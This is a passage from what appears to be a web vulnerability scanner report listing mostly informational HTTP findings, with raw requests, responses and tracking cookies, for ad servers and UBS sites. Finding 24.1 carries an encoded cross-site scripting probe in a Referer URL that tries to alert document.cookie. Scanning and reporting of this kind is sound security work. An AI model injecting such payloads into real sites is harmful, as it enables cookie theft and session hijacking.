<head>
<title>Sync</title>
...[SNIP]...

23.3. http://analytics.msn.com/Include.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.msn.com
Path:   /Include.html

Request

GET /Include.html HTTP/1.1
Host: analytics.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://analytics.microsoft.com/Sync.html
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; mh=LENOVO; CC=US; CULTURE=EN-US; MSNRPSShare=1; MUID=3957719BE8F34A5DA51D204E7E06704A; Sample=87; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=a7ed379634844c0891f7fd0905cd7d4e&bd=2011-07-02T23:40:18.696&v=2; SRCHHPGUSR=AS=1; MSNTVID=af7f3bc9414d4d7f98f7762d0ecd4c67

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:27 GMT
Accept-Ranges: bytes
ETag: "fa66cf352ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:57 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

23.5. https://fundgate.ubs.com/GIS/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fundgate.ubs.com
Path:   /GIS/Default.aspx

Request

GET /GIS/Default.aspx HTTP/1.1
Host: fundgate.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:09:06 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: 0
Content-Length: 11137
Content-Type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
   <meta name="robots" content="noindex,nofollow"><title>UBS Global Asset Managem
...[SNIP]...

23.6. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

23.7. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 119983

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...

23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /awu/help/inter/en/ubsHelp.htm

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:24 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1958
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/awu/help/inter/en/ubs
...[SNIP]...

23.9. https://nae.ubs.com/quotes

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /quotes

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:21 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1935
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes">
</head>
<bod
...[SNIP]...

23.10. https://nae.ubs.com/quotes/markets_instruments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://nae.ubs.com
Path:   /quotes/markets_instruments

Request

GET /quotes/markets_instruments?locale=en_US HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982086459:ss=1309981804815

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 13:59:00 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1968
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

23.11. https://onesource.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onesource.ubs.com
Path:   /

Request

GET / HTTP/1.1
Host: onesource.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Wed, 06 Jul 2011 14:08:16 GMT
Content-length: 10173
Content-type: text/html
Etag: "94d76da3-3-0-27bd"
Last-modified: Sun, 19 Jun 2011 19:32:07 GMT
Accept-ranges: bytes
Connection: close

<!--
File name: internet\index.html
-->
<HTML>
<HEAD>
<TITLE>Missing Ticker Error Page</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="styles/styles_rdsgn.css">
</HEAD>

<BODY>
<TABLE BORDER=
...[SNIP]...

23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/olspages/documents/viewPrint.html

Request

GET /staticfiles/olspages/documents/viewPrint.html HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-type: text/html
date: Wed, 06 Jul 2011 14:08:13 GMT
etag: "8001-4dfa7d49"
last-modified: Thu, 16 Jun 2011 22:01:45 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 32769

<html>    
   <HEAD>    
   <LINK href="https://onlineservices.ubs.com/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
   <title>Online Services</title>
   <SCRIPT language=javascript
...[SNIP]...

23.13. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

23.14. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=31&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; segments_p1="eJwtUU1LAlEUJWcWr7ean9IP6Ce0r7W7Nv6GTFwkzcZokZUxWQRR6oxCH5KbxK9BclGUWkKghpHQEDSBpr1zaHM4nHvPPffdJ3XhFTSpi+0csPETUNidzCl8u4IyaEOJ94GjXkBq4jwk54UVNE4usp6uVJeeSg9oVtAxXVY0T2OZow4n4HsjcOcGfJ/KcRgRZT+gJqaCxvX/xI8xii1l1URNKKjAeHqH5icftTq3rTKzZiIzvCKlKNmakbYSvq6EbAh7D9DRMIGJLUyp0eMOwb1PYHFM5CuSHnh+Br7OjGfm7bD67UB5HyNvtqToZh/UWlT0ls5WEx0u85p0ZnmG+wyqLrOtR+CQb+yw54gblGLw+r/gKZ4nMgW/TANfO1AeHPAkL1HlfpEZVrAFtsmhuKZkKTpR3XiZRHnOPMfbHmOLwH6O16ceLwC/+LW7C/hD3szk9NEB5JSh6Bm72z6E2KqimSb+Z4rk7ob2B83Zo/U="; partnerUID=eyIxMTUiOiBbIjRkY2U4YTUzMDUwOGIwMmQiLCB0cnVlXSwgIjE5MSI6IFsiODQ5NjUzMDYzOTI1MzI1NTgwNiIsIHRydWVdLCAiMTUiOiBbIjAwNDAwMzAwMTQwMDAwMDQ0OTg3MiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXSwgIjExMyI6IFsiRlFXV0MyVksyRFdGIiwgdHJ1ZV19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 
1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuG4v5hNgEniSNfFDywKjBpnZgBpA0YLMJ9LhGPiMlYBRonmTUuBsgwaDAYMFgxA0bcT2QQ4JB5vQBaV4Jg1gw2otmntUrBJTd23gCZB1M99DDLl+p0lKKasmA8S/dbUiiK65j8T0D3P0ER7F4DMbjn79D2y6OuJINGDD6+jiE5+DzL3QsNmFNHfC0Gic9FE775kAYrO+NCAIroT6LIsiU/vkUVFOWb+YBFoZZZYdBpVeNdXFoGJjBLnlv9/hyw8C2jGNUaJKy//vUM2+uwLVgFmiX1P76GIfnwFdtyuCyiiszaCRG99P4gQBQCc9nZ9"; io_freq_p1="eJzjkuY4mCDAJHGk6+IHFgVGjSNrr31gMWC0APO5hDn6wgQYJZo3LQVKMmgwGDBYMAAFl8QLcEo83oAq+DIeqLJpLargnQig4PU7S5AERTi2hQocZJL41tSKovSHDdAZz9AElyUA9becffoeWfBxDFDwQsNmFMELoUDBuWiCTwOAgjM+NLxHtv5HoEArs8Si06iitwIFJjJKnFv+/x2yAZtjBJgl9j29hyJ4FGT/3F0XUAS7w4GCt74fRAgCADwQWy8="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 06 Jul 2011 11:21:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 06-Jul-2011 11:21:20 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 26

<html><body></body></html>

24. HTML uses unrecognised charset
There are 2 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, an unrecognised charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


24.1. http://adonmax.com/afr.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
